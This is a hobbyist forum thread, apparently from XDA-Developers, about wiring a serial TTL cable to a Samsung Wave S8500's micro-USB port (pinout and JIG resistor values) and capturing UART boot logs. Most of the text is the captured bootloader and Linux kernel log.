As I'm new to Samsung handsets...
Has anyone tried to play with a serial cable and Qualcomm tools, like Memory Debug for instance?
Download Mode does not allow USB Diag for Qualcomm... only the Samsung modem is still alive in Download Mode. So the question is: with a serial cable, maybe there is a chance to dump something, as you can port to UART...
Best Regards
delete.......
I use a usb->serial-ttl 3.3V converter with a 528K resistor on pins 4-5 for outputting diag messages. And you need a JIG with a 301K resistor for entering download mode.
http://forum.xda-developers.com/showpost.php?p=12689198&postcount=181
Thanx for this info, but too difficult for me to understand.
Please help to make such a cable for research... or maybe there are existing cables to buy?
I need something like this:
http://www.badanation.de/topic.php?t=1616&page=fst_unread&highlight=widerstand
Such Pictures would be nice:
http://h-3.abload.de/img/p1000660eei7.jpg
I need FULL Pinout please for S8500.
Thanx in advance.
Best Regards
You mean cable/plug for enter download mode? You can buy it. For example in Poland I can buy this for 12 zlotys = 3 euro + delivery costs.
I found that, for Galaxy S, but is possible this is the same
forum.xda-developers.com/showthread.php?t=819551
I "need" alternate cable for communication between PC and S8500.
Also FULL Pinout is welcome.
Best Regards
http://forum.xda-developers.com/showthread.php?t=820275
Here seems few infos... maybe also work for S8500.
Best Regards
After I saw successfully log from srg.mstr.
Thank you very much.
http://forum.xda-developers.com/showpost.php?p=13426392&postcount=183
Less than 1 Euro for male Connector:
http://www.conrad.de/ce/de/product/733923/MICRO-USB-STECKER-TYP-B-5POL/SHOP_AREA_40306
So I will buy few Connectors...
Now I will make checklist for other parts and prices. As I have no cables at home to cut...
Best Regards
TX<-->2
RX<-->3
GND<-->5
resistor between 4<-->5
http://forum.xda-developers.com/showpost.php?p=13293404&postcount=174
Will try to make such cable this year... in 2013 really.
Checklist...
http://www.conrad.de/ce/de/product/...Kabelmontage-ohne-Gehaeuse-BKL-Electronic-Inh
.
.
.
Best Regards
Will try to make such cable this year...
Uupsi, only 2 months left... but I have found other way for Bootlog...
via JTAG RAM dump... something above 0x40000000...
Looks like this:
http://forum.xda-developers.com/showpost.php?p=47037737&postcount=34
Best Regards
2013 soon over... but Mission UART is not over...
New attempt... for 2014...
It seems now "cheap" USB stuff available... based on PL2303... symbolic Photo attached...
According to this Pic...
http://forum.xda-developers.com/showpost.php?p=13426392&postcount=183
Other idea is to solder direct to RX TX and GND on PCB... instead resistor...
Maybe...
Best Regards
Short tested with 3 wires soldered direct to RX TX and Ground under battery/label...
Hmm... first test failed with WinComm... maybe my settings are wrong, will try other Tool for Logging...
Best Regards
Btw...
Never seen S5250 or S8600 user trying to capture data over UART...
Code:
[PAM: ] OneNAND physical base address : 0xb0000000
[PAM: ] OneNAND virtual base address : 0xb0000000
[PAM: ] FSR_PAM_InitNANDController Success!!
[PAM: ] --FSR_PAM_Init
[BM : ] FSR_BML_GetFullPartI() is completed
[BM : ] stPartI.nNumOfPartEntry : 7
[BM : ] 1th PartEntrt(nAttr:0x1002)(nID:0x0)
[BM : ] [1th] pPEntry->n1stVun : 1
[BM : ] [1th] pPEntry->nNumOfUnits : 7
[BM : ] [1th] pPEntry->nLoadAddr : 0x0
+-------------------------------+
| Bootloader Shadowing FINISHED |
+-------------------------------+
Launch Image at 0x42480000
[BOOT_V1.0 (May 28 2010, 21:22:23)]
SelectBootingMode: H/W...0xe.
[BOOT] ARMCLK: 400000 KHz, MSYSHCLK 200000 KHz,MSYSPCLK: 100000 KHz, [BOOT] DSYSHCLK 166750 KHz,DSYSPCLK: 83375 KHz,PSYSHCLK: 133400 KHz, PSYSPCLK: 66700 KHz,SYSCON_A2M: 200000 KHz
+++FIMD_Drv_INITIALIZE
FIMD_Drv_ChangeMode: MDNIE_MODE
Frame Rate:62 SCLK_FIMD:133400 kHz ClkDiv:4
S6E63M0 : LDI_Pentile_Set_Change Pentile_Value =6c
---FIMD_Drv_INITIALIZE
---FIMD_Drv_SetWinOnOff(WIN4:1)
LCD initialize Finished
Flash_Unlock failed
Poweron status - c0
FSA9480 0x03 Register = 0
FSA9480 0x0A Register = 0
FSA9480 0x0B Register = 0
FSA9480 0x07 Register = 1f
Used WinComm as Tool...
Stupid me, I did not realize that TX connects to RX and RX to TX...
Best Regards
Code:
[PAM: ] ++FSR_PAM_Init
[PAM: ] OneNAND physical base address : 0xb0000000
[PAM: ] OneNAND virtual base address : 0xb0000000
[PAM: ] FSR_PAM_InitNANDController Success!!
[PAM: ] --FSR_PAM_Init
bl3_info_block 1 and 2 not found, Load BL3
+-------------------------------+
| Bootloader Shadowing FINISHED |
+-------------------------------+
Launch Image at 0x42080000
[BOOT_V1.0 (Jan 5 2012, 19:08:14)]
SelectBootingMode: H/W...0xe.
[BOOT] ARMCLK: 400000 KHz, MSYSHCLK 200000 KHz,MSYSPCLK: 100000 KHz, [BOOT] DSYSHCLK 166750 KHz,DSYSPCLK: 83375 KHz,PSYSHCLK: 133400 KHz, PSYSPCLK: 66700 KHz,SYSCON_A2M: 200000 KHz
+++FIMD_Drv_INITIALIZE
FIMD_Drv_ChangeMode: MDNIE_MODE
Frame Rate:62 SCLK_FIMD:133400 kHz ClkDiv:4
S6E63M0 : LDI_Pentile_Set_Change Pentile_Value =6c
---FIMD_Drv_INITIALIZE
---FIMD_Drv_SetWinOnOff(WIN4:1)
LCD initialize Finished
Flash_Unlock failed
Poweron status - 0
FSA9480 0x03 Register = 0
FSA9480 0x0A Register = 4
FSA9480 0x0B Register = 0
FSA9480 0x07 Register = 1f
Display_LSI_Boot : disp_Main_Clean
Display_LSI_Boot : disp_Main_Clean_All
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_dimming_backlight
LDI_S6E63M0_Set_Brightness is Return (Level: 1)
Display_LSI_Boot : disp_dimming_backlight
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
+SDHC_Open(Ch0)
univ_SD_MEM_PowerOnDevice() : Power On
univ_SD_MEM_PowerOnDevice(ch0) : MASSMEMORY_EN Power On
[SDHC] MPLL source clock from SYSCON : 667000000Hz
[SDHC] SDHC(ch0) source clock from SYSCON : 47642000Hz
[SDHC] SDHC(ch0) Operating Clock : 372203Hz
[SDHC][MMC]byte mode
SD_MEM_Phy_CMD2(ch0) : CID(127~0) : 0x150100, 0x4d324731, 0x44441655, 0x3c7886d
SD_MEM_Phy_Check_moviNAND_Version(ch0) : PRV - 0x16
MMC_Spec = 4
----------------CSD Version 1.0--------in low level-------------
channel: [0]
One Block Size: [512]Byte
Total card Block Count = [4014080]
Total card Capacity Size = [1960]MB
---------------------------------------------------
SD_HostCtrl_IssueCommand[ch0] not SDclk off, cmd13, SD_CLK_CTRL:0x400f
SD_MEM_Phy_TransferState(ch0) :High: Tx : SD_FeedBackClock_BasicDelay
SD_MEM_Phy_TransferState(ch0) :High: Rx : SD_FeedBackClock_InverterDelay
[SDHC] MPLL source clock from SYSCON : 667000000Hz
[SDHC] SDHC(ch0) source clock from SYSCON : 47642000Hz
[SDHC] SDHC(ch0) Operating Clock : 47642000Hz
SD_HostCtrl_IssueCommand[ch0] not SDclk off, cmd13, SD_CLK_CTRL:0xf
SD_HostCtrl_IssueCommand[ch0] not SDclk off, cmd13, SD_CLK_CTRL:0xf
-SDHC_Open(Ch0)
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
DRV_modem_reset!!!!!!!!!!!!!!!!!
DRV_Send_DBL!!!!!!!!!!!!!!!!!
[DLOAD] Download Completed !!!
DRV_Wait_ModemInit!!!!!!!!!!!!!!!!!
DRV_CopyQSCBootBinary!!!!!!!!!!!!!!!!!
DRV_Send_BootBinaryCopyComplete!!!!!!!!!!!!!!!!!
DRV_Modem_BootingStart retry count = 0.
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Display_LSI_Boot : disp_Main_Dload_Update
Display_LSI_Boot : disp_Main_Dload_Message
Uncompressing Linux... done, booting the kernel.
<6>Initializing cgroup subsys cpu
<5>Linux version 3.0.86-g5b25f8d ([email protected]) (gcc version 4.6.x-google 20120106 (prerelease) (GCC) ) #1 PREEMPT Tue Nov 5 22:35:53 CET 2013
CPU: ARMv7 Processor [412fc082] revision 2 (ARMv7), cr=10c53c7d
CPU: VIPT nonaliasing data cache, VIPT aliasing instruction cache
Machine: wave
Memory policy: ECC disabled, Data cache writeback
CPU S5PV210/S5PC110 (id 0x43110222)
<7>s5pv210_init_clocks: initializing clocks
<6>S3C24XX Clocks, Copyright 2004 Simtec Electronics
<4>s3c24xx_register_clock: new clock sclk_csis, id -1, dev (null) uses same enable bit as mout_csis, id -1, dev (null)
<4>s3c24xx_register_clock: new clock lcd, id -1, dev (null) uses same enable bit as sclk_fimd, id -1, dev (null)
<4>s3c24xx_register_clock: new clock mfc, id -1, dev (null) uses same enable bit as sclk_mfc, id -1, dev (null)
<4>s3c24xx_register_clock: new clock iis, id 0, dev (null) uses same enable bit as i2s_v50, id 0, dev (null)
<7>s5pv210_setup_clocks: registering clocks
<7>s5pv210_setup_clocks: clkdiv0 = 14131330, clkdiv1 = 00400400
<7>s5pv210_setup_clocks: xtal is 24000000
<6>S5PV210: PLL settings, A=800000000, M=667000000, E=80000000 V=54000000<6>S5PV210: ARMCLK=800000000, HCLKM=200000000, HCLKD=166750000
HCLKP=133400000, PCLKM=100000000, PCLKD=83375000, PCLKP=66700000
<6>sclk_dmc: source is mout_mpll (1), rate is 166750000
<6>sclk_onenand: source is hclk_dsys (1), rate is 83375000
<6>sclk: source is mout_mpll (6), rate is 133400000
<6>sclk: source is mout_mpll (6), rate is 66700000
<6>sclk: source is mout_mpll (6), rate is 66700000
<6>sclk: source is mout_mpll (6), rate is 66700000
<6>sclk_mixer: source is sclk_dac (0), rate is 54000000
<6>sclk_fimc: source is ext_xtal (0), rate is 24000000
<6>sclk_fimc: source is ext_xtal (0), rate is 24000000
<6>sclk_fimc: source is ext_xtal (0), rate is 24000000
<6>sclk_cam: source is xusbxti (1), rate is 24000000
<6>sclk_cam: source is ext_xtal (0), rate is 24000000
<6>sclk_fimd: source is mout_mpll (6), rate is 133400000
<6>sclk_mmc: source is mout_mpll (6), rate is 51307692
<6>sclk_mmc: source is mout_mpll (6), rate is 47642857
<6>sclk_mmc: source is mout_mpll (6), rate is 47642857
<6>sclk_mmc: source is mout_mpll (6), rate is 47642857
<6>sclk_mfc: source is sclk_a2m (0), rate is 200000000
<6>sclk_fimg2d: source is sclk_a2m (0), rate is 200000000
<6>sclk: source is mout_mpll (1), rate is 66700000
<6>sclk_csis: source is ext_xtal (0), rate is 24000000
<6>sclk_spi: source is mout_epll (7), rate is 80000000
<6>sclk_spi: source is mout_epll (7), rate is 80000000
<6>sclk_pwi: source is ext_xtal (0), rate is 24000000
<6>sclk_pwm: source is ext_xtal (0), rate is 24000000
<6>sclk_mdnie: source is mout_mpll (6), rate is 166750000
<6>sclk_mdnie_pwm: source is ext_xtal (0), rate is 24000000
<6>s5p: 11534336 bytes system memory reserved for mfc at 0x24500000, 0-bank base(0x24500000)
<6>s5p: 11534336 bytes system memory reserved for mfc at 0x4f3f4000, 1-bank base(0x4f3f4000)
<6>s5p: 11534336 bytes system memory reserved for fimc0 at 0x4e8f4000, 1-bank base(0x4e8f4000)
<6>s5p: 11534336 bytes system memory reserved for fimc2 at 0x4ddf4000, 1-bank base(0x4ddf4000)
<6>s5p: 4194304 bytes system memory reserved for jpeg at 0x24500000, 0-bank base(0x24500000)
<6>s5p: 7680000 bytes system memory reserved for fimd at 0x4d6a1000, 1-bank base(0x4d6a1000)
<7>On node 0 totalpages: 72621
<7> Normal zone: 1534 pages used for memmap
<7> Normal zone: 0 pages reserved
<7> Normal zone: 71087 pages, LIFO batch:15
<7>pcpu-alloc: s0 r0 d32768 u32768 alloc=1*32768
<7>pcpu-alloc: [0] 0
Built 1 zonelists in Zone order, mobility grouping on. Total pages: 71087
<5>Kernel command line: init=/init loglevel=4
<6>PID hash table entries: 2048 (order: 1, 8192 bytes)
<6>Dentry cache hash table entries: 65536 (order: 6, 262144 bytes)
<6>Inode-cache hash table entries: 32768 (order: 5, 131072 bytes)
<6>Memory: 69MB 214MB 0MB = 283MB total
<5>Memory: 272496k/325052k available, 17988k reserved, 0K highmem
<5>Virtual kernel memory layout:
vector : 0xffff0000 - 0xffff1000 ( 4 kB)
fixmap : 0xfff00000 - 0xfffe0000 ( 896 kB)
DMA : 0xff000000 - 0xffe00000 ( 14 MB)
vmalloc : 0xf0000000 - 0xfc000000 ( 192 MB)
lowmem : 0xc0000000 - 0xeff00000 ( 767 MB)
modules : 0xbf000000 - 0xc0000000 ( 16 MB)
.init : 0xc0008000 - 0xc0617000 (6204 kB)
.text : 0xc0617000 - 0xc0ce8000 (6980 kB)
.data : 0xc0ce8000 - 0xc0d34880 ( 307 kB)
.bss : 0xc0d348a4 - 0xc0e76ad8 (1289 kB)
<6>SLUB: Genslabs=11, HWalign=64, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
<6>Preemptible hierarchical RCU implementation.
<6>NR_IRQS:339
<6>VIC @fc000000: id 0x00041192, vendor 0x41
<6>VIC @fc010000: id 0x00041192, vendor 0x41
<6>VIC @fc020000: id 0x00041192, vendor 0x41
<6>VIC @fc030000: id 0x00041192, vendor 0x41
<6>mult[140737]
<6>max_delta_ns[2937815369]
<6>min_delta_ns[30517]
<6>rate[32768]
<6>HZ[256]
<6>Console: colour dummy device 80x30
<6>console [tty0] enabled
<6>Calibrating delay loop... <c>795.12 BogoMIPS (lpj=1554432)
<6>pid_max: default: 32768 minimum: 301
<6>Mount-cache hash table entries: 512
<6>Initializing cgroup subsys debug
<6>Initializing cgroup subsys cpuacct
<6>Initializing cgroup subsys freezer
<6>CPU: Testing write buffer coherency: ok
<6>hw perfevents: enabled with ARMv7 Cortex-A8 PMU driver, 5 counters available
<6>print_constraints: dummy:
<6>NET: Registered protocol family 16
<6>ram_console: got buffer at 4ff00400, size fec00
<6>ram_console: uncorrectable error in header
<6>ram_console: no valid data in buffer (sig = 0xfeffdfff)
<6>console [ram-1] enabled
<6>S5PC110 Hardware version : EVT1
<6>HWREV is 0xf
S3C Power Management, Copyright 2004 Simtec Electronics
<6>pmstats at 4ffff000
<3>invalid media device
<3>invalid media device
<6>hw-breakpoint: debug architecture 0x4 unsupported.
<6>S5PV210: Initializing architecture
<6>s3c24xx-pwm s3c24xx-pwm.0: tin at 66700000, tdiv at 66700000, tin=divclk, base 0
<6>s3c24xx-pwm s3c24xx-pwm.1: tin at 66700000, tdiv at 66700000, tin=divclk, base 8
<6>s3c24xx-pwm s3c24xx-pwm.2: tin at 66700000, tdiv at 66700000, tin=divclk, base 12
<6>s3c24xx-pwm s3c24xx-pwm.3: tin at 66700000, tdiv at 66700000, tin=divclk, base 16
<6>print_constraints: pd_audio_supply: 5000 mV normal
<6>print_constraints: pd_cam_supply: 5000 mV normal
<6>print_constraints: pd_tv_supply: 5000 mV normal
<6>print_constraints: pd_lcd_supply: 5000 mV normal
<6>print_constraints: pd_g3d_supply: 5000 mV normal
<6>print_constraints: pd_mfc_supply: 5000 mV normal
<6>bio: create slab <bio-0> at 0
<5>SCSI subsystem initialized
<6>usbcore: registered new interface driver usbfs
<6>usbcore: registered new interface driver hub
<6>usbcore: registered new device driver usb
<6>i2c-gpio i2c-gpio.4: using pins 247 (SDA) and 246 (SCL)
<6>i2c-gpio i2c-gpio.5: using pins 203 (SDA) and 204 (SCL)
<3>max8998 6-0066: No interrupt base specified, no interrupts
<3>i2:10, buck2_idx:0
<6>print_constraints: VALIVE_1.2V: 1200 mV
<6>print_constraints: VUSB_1.1V: 1100 mV
<6>print_constraints: VADC_3.3V: 3300 mV
<6>print_constraints: VTF_2.8V: 2800 mV
<6>print_constraints: VLCD_1.8V: 1800 mV
<6>print_constraints: VUSB_3.3V: 3300 mV
<6>print_constraints: VCC_2.8V_PDA: 2800 mV
<6>print_constraints: CAM_AF_2.8V: 2800 mV
<6>print_constraints: CAM_SENSOR_1.2V: 1200 mV
<6>print_constraints: CAM_SENSOR_A2.8V: 2800 mV
<6>print_constraints: CAM_ISP_1.8V: 1800 mV
<6>print_constraints: CAM_ISP_HOST_2.8V: 2800 mV
<6>print_constraints: VGA_DVDD_1.8V: 1800 mV
<6>print_constraints: VCC_3.0V_LCD: 2800 <--> 3200 mV at 3200 mV
<6>print_constraints: VDD_ARM: 750 <--> 1500 mV at 1200 mV
<6>print_constraints: VDD_INT: 750 <--> 1500 mV at 1100 mV
<6>print_constraints: VCC_1.8V: 1800 mV
<6>print_constraints: CAM_ISP_CORE_1.2V: 1200 mV
<6>print_constraints: USB_VBUS_AP:
<6>print_constraints: USB_VBUS_CP:
<6>i2c-gpio i2c-gpio.6: using pins 206 (SDA) and 209 (SCL)
<6>i2c-gpio i2c-gpio.7: using pins 201 (SDA) and 202 (SCL)
<6>i2c-gpio i2c-gpio.8: using pins 42 (SDA) and 43 (SCL)
<6>i2c-gpio i2c-gpio.11: using pins 114 (SDA) and 98 (SCL)
<6>i2c-gpio i2c-gpio.12: using pins 199 (SDA) and 200 (SCL)
<6>s3c-i2c s3c2440-i2c.0: i2c-0: S3C I2C adapter
<6>s3c-i2c s3c2440-i2c.1: i2c-1: S3C I2C adapter
<6>s3c-i2c s3c2440-i2c.2: i2c-2: S3C I2C adapter
<6>Advanced Linux Sound Architecture Driver Version 1.0.24.
<6>Bluetooth: Core ver 2.16
<6>NET: Registered protocol family 31
<6>Bluetooth: HCI device and connection manager initialized
<6>Bluetooth: HCI socket layer initialized
<6>Bluetooth: L2CAP socket layer initialized
<6>Bluetooth: SCO socket layer initialized
<6>Switching to clocksource clock_source_systimer
<6>cfg80211: Calling CRDA to update world regulatory domain
<6>Switched to NOHz mode on CPU #0
<6>NET: Registered protocol family 2
<6>IP route cache hash table entries: 4096 (order: 2, 16384 bytes)
<6>TCP established hash table entries: 16384 (order: 5, 131072 bytes)
<6>TCP bind hash table entries: 16384 (order: 4, 65536 bytes)
<6>TCP: Hash tables configured (established 16384 bind 16384)
<6>TCP reno registered
<6>UDP hash table entries: 256 (order: 0, 4096 bytes)
<6>UDP-Lite hash table entries: 256 (order: 0, 4096 bytes)
<6>NET: Registered protocol family 1
<6>PMU: registered new PMU device of type 0
<4>clk_get: could not find clock emu_src_ck for dev s5pv210_etb_device+0x0/0x100 (etb)
<6>wake enabled for irq 165
<6>wake disabled for irq 165
<6>S5PV210 ADC driver, (c) 2010 Samsung Electronics
<6>Loaded driver for PL330 DMAC-0 s3c-pl330
<6> DBUFF-64x8bytes Num_Chans-8 Num_Peri-2 Num_Events-32
<6>Loaded driver for PL330 DMAC-1 s3c-pl330
<6> DBUFF-8x4bytes Num_Chans-8 Num_Peri-32 Num_Events-32
<6>Loaded driver for PL330 DMAC-2 s3c-pl330
<6> DBUFF-8x4bytes Num_Chans-8 Num_Peri-32 Num_Events-32
<6>ashmem: initialized
<6>ROMFS MTD (C) 2007 Red Hat, Inc.
<7>yaffs: yaffs built Nov 5 2013 22:34:00 Installing.
<6>msgmni has been set to 532
<6>io scheduler noop registered
<6>io scheduler deadline registered
<6>io scheduler row registered (default)
<6>io scheduler cfq registered
<6>io scheduler sio registered
MDNIE INIT ..........
<6>S3C MDNIE Driver, (c) 2010 Samsung Electronics
MDNIE INIT SUCCESS Addr : 0xf003c000
IELCD INIT ..........
<6>S3C IELCD Driver, (c) 2010 Samsung Electronics
IELCD INIT SUCCESS Addr : 0xf0040000
<6>s3cfb s3cfb: [fb2] dma: 0x4db06000, cpu: 0xf0400000, size: 0x002ee000
<6>FIMD src sclk = 166750000
<6>s3cfb s3cfb: pixclock adjusted from 39019 to 41979
<6>[mDNIe] mDNIe_tuning_initialize: addr(0x84), data(0x0)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0x90), data(0x0)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0x94), data(0xfff)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0x98), data(0x5c)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0x9c), data(0x10)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0xac), data(0x0)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0xb4), data(0x3ff)
[mDNIe] mDNIe_Set_Mode: current_mDNIe_UI(6), current_mDNIe_OutDoor_OnOff(0)
<6>s3cfb_late_resume is called
<6>FIMD src sclk = 166750000
<6>s3cfb s3cfb: pixclock adjusted from 41979 to 41979
<6>[mDNIe] mDNIe_tuning_initialize: addr(0x84), data(0x0)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0x90), data(0x0)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0x94), data(0xfff)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0x98), data(0x5c)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0x9c), data(0x10)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0xac), data(0x0)
<6>[mDNIe] mDNIe_tuning_initialize: addr(0xb4), data(0x3ff)
[mDNIe] mDNIe_Set_Mode: current_mDNIe_UI(6), current_mDNIe_OutDoor_OnOff(0)
<3>panel_reset_lcd
<6>s3cfb_late_resume is complete
<6>s3cfb s3cfb: registered successfully
<6>s5pv210-uart.0: s3c2410_serial0 at MMIO 0xe2900000 (irq = 16) is a S3C6400/10
<6>s5pv210-uart.1: s3c2410_serial1 at MMIO 0xe2900400 (irq = 20) is a S3C6400/10
<6>s5pv210-uart.3: s3c2410_serial3 at MMIO 0xe2900c00 (irq = 28) is a S3C6400/10
PA FB = 0x4DB06000, bits per pixel = 32
screen width=480 height=800 va=0xedb06000 pa=0x4db06000
xres_virtual = 480, yres_virtual = 1600, xoffset = 0, yoffset = 0
fb_size=3072000
Back frameBuffer[0].VAddr=edc7d000 PAddr=4dc7d000 size=1536000
No space for NV12 video carveout
<6>brd: module loaded
<6>loop: module loaded
<6>Android kernel panic handler initialized (bind=kpanic)
<6>sec_jack_probe : Registering jack driver
<6>wake enabled for irq 38
<6>sec_jack_init_jack_state<6>sec_jack_set_micbias_state: HWREV=15, on=1
<6>handle_jack_not_inserted
<6>sec_jack_set_micbias_state: HWREV=15, on=0
<6>sec_jack_set_micbias_state: HWREV=15, on=0
<6>wake enabled for irq 167
<6>fsa9480 7-0025: dev1: 0x4, dev2: 0x0
<4>i2c-core: driver [fsa9480] using legacy suspend method
<4>i2c-core: driver [fsa9480] using legacy resume method
<6>modem_io_init done
<6>[MODEM] bp_irq() - PHONE_ACTIVE interrupt, 1 occurence
<6>wake enabled for irq 47
<6>wake enabled for irq 43
<6>modemctl probed
<6>Muxed OneNAND 512MB 1.8V 16-bit (0x50)
<6>OneNAND version = 0x013e
<7>Chip support all block unlock
<7>Chip has 4KiB pagesize
<7>Chip has cache program feature
<6>Scanning device for bad blocks
<7>onenand_bbt_wait: ecc 0xaaaa ctrl 0x0400 intr 0x8080 addr1 0x1dd addr8 0x0
<6>OneNAND eraseblock 477 is an initial bad block
<7>onenand_bbt_wait: ecc 0xaaaa ctrl 0x0400 intr 0x8080 addr1 0x6cf addr8 0x0
<6>OneNAND eraseblock 1743 is an initial bad block
<7>onenand_bbt_wait: ecc 0xaaaa ctrl 0x0400 intr 0x8080 addr1 0x73f addr8 0x0
<6>OneNAND eraseblock 1855 is an initial bad block
<6>OneNAND eraseblock 2047 is an initial bad block
<5>Creating 2 MTD partitions on "(null)":
<5>0x00001e700000-0x00001ec00000 : "nv_data"
<5>0x000003300000-0x000003600000 : "fota"
<6>tl2796: c0, b-6bea38dc, got v 2051000, factory wants 2051000
<6>tl2796: c1, b-7f519b2b, got v 2044000, factory wants 2044000
<6>tl2796: c2, b-ae797fc2, got v 1491000, factory wants 1491000
<6>tl2796_probe successfully probed
<6>PPP generic driver version 2.4.2
<6>PPP Deflate Compression module registered
<6>PPP BSD Compression module registered
<6>PPP MPPE Compression module registered
<6>NET: Registered protocol family 24
<6>tun: Universal TUN/TAP device driver, 1.6
<6>tun: (C) 1999-2004 Max Krasnyansky <[email protected]>
<6>s3c-udc : S3C HS USB Device Controller Driver, (c) 2008-2009 Samsung Electronics
s3c-udc : version 15 March 2009 (DMA Mode)
<6>android_usb gadget: Mass Storage Function, version: 2009/09/11
<6>android_usb gadget: Number of LUNs=2
<6> lun0: LUN: removable file: (no medium)
<6> lun1: LUN: removable file: (no medium)
<6>android_usb gadget: android_usb ready
<7>Registered gadget driver 'android_usb'
<6>input: gpio-keys as /devices/platform/gpio-keys.0/input/input0
<6>input: s5pv210-keypad as /devices/platform/s5pv210-keypad/input/input1
<6>usbcore: registered new interface driver xpad
<6>usbcore: registered new interface driver usb_acecad
<6>acecad: v3.2:USB Acecad Flair tablet driver
<6>usbcore: registered new interface driver aiptek
<6>aiptek: v2.3 (May 2, 2007):Aiptek HyperPen USB Tablet Driver (Linux 2.6.x)
<6>aiptek: Bryan W. Headley/Chris Atenasio/Cedric Brun/Rene van Paassen
<6>usbcore: registered new interface driver gtco
GTCO usb driver version: 2.00.0006<6>usbcore: registered new interface driver hanwang
<6>usbcore: registered new interface driver kbtab
<6>kbtab: v0.0.2:USB KB Gear JamStudio Tablet driver
<6>usbcore: registered new interface driver wacom
<6>wacom: v1.52:USB Wacom tablet driver
<6>input: mxt224_ts_input as /devices/virtual/input/input2
<6>Atmel MXT224 2-004a: family = 0x80, variant = 0x1, version = 0x16, build = 171
<6>bma023 5-0038: bma023 found
<6>bma023 5-0038: al_version=2, ml_version=1
<6>input: accelerometer_sensor as /devices/virtual/input/input3
<3>gp2a: proximity val = 1
<6>input: proximity as /devices/virtual/input/input4
<6>input: orientation_sensor as /devices/virtual/input/input5
<6>max8998-rtc max8998-rtc: RTC CHIP NAME: max8998-rtc
S3C24XX RTC, (c) 2004,2006 Simtec Electronics
<6>s3c-rtc s3c2410-rtc: rtc disabled, re-enabling
<6>s3c-rtc s3c2410-rtc: rtc disabled, re-enabling
<6>s3c-rtc s3c2410-rtc: rtc disabled, re-enabling
<6>s3c-rtc s3c2410-rtc: rtc disabled, re-enabling
<6>using rtc device, s3c, for alarms<6>s3c-rtc s3c2410-rtc: rtc core: registered s3c as rtc0
<6>i2c /dev entries driver
<6>lirc_dev: IR Remote Control driver registered, major 251
<6>IR NEC protocol handler initialized
<6>IR RC5(x) protocol handler initialized
<6>IR RC6 protocol handler initialized
<6>IR JVC protocol handler initialized
<6>IR Sony protocol handler initialized
<6>IR RC5 (streamzap) protocol handler initialized
<6>IR LIRC bridge handler initialized
<6>Linux video capture interface: v2.00
<6>mfc_init: <6>S5PC110 MFC Driver, (c) 2009 Samsung Electronics
<6>S3C JPEG Driver, (c) 2007 Samsung Electronics
<6>JPEG driver for S5PV210
<4>i2c-core: driver [s5p_ddc] using legacy suspend method
<4>i2c-core: driver [s5p_ddc] using legacy resume method
<4>i2c-core: driver [Si4709] using legacy suspend method
<4>i2c-core: driver [Si4709] using legacy resume method
<6>device-mapper: uevent: version 1.0.3
<6>device-mapper: ioctl: 4.20.0-ioctl (2011-02-02) initialised: [email protected]
<6>Bluetooth: HCI UART driver ver 2.2
<6>Bluetooth: HCI H4 protocol initialized
<6>cpuidle: using governor ladder
<6>cpuidle: using governor menu
<6>sdhci: Secure Digital Host Controller Interface driver
<6>sdhci: Copyright(c) Pierre Ossman
<6>s3c-sdhci s3c-sdhci.0: clock source 0: hsmmc (133400000 Hz)
<6>s3c-sdhci s3c-sdhci.0: clock source 2: sclk_mmc (51307692 Hz)
<6>mmc0: SDHCI controller on samsung-hsmmc [s3c-sdhci.0] using ADMA
<6>s3c-sdhci s3c-sdhci.1: clock source 0: hsmmc (133400000 Hz)
<6>s3c-sdhci s3c-sdhci.1: clock source 2: sclk_mmc (47642857 Hz)
<6>mmc1: SDHCI controller on samsung-hsmmc [s3c-sdhci.1] using ADMA
<6>s3c-sdhci s3c-sdhci.2: clock source 0: hsmmc (133400000 Hz)
<6>s3c-sdhci s3c-sdhci.2: clock source 2: sclk_mmc (47642857 Hz)
<6>mmc2: SDHCI controller on samsung-hsmmc [s3c-sdhci.2] using ADMA
<6>usbcore: registered new interface driver usbhid
<6>usbhid: USB HID core driver
<6>logger: created 256K log 'log_main'
<6>logger: created 256K log 'log_events'
<6>logger: created 256K log 'log_radio'
<6>logger: created 256K log 'log_system'
<6>zram: num_devices not specified. Using default: 1
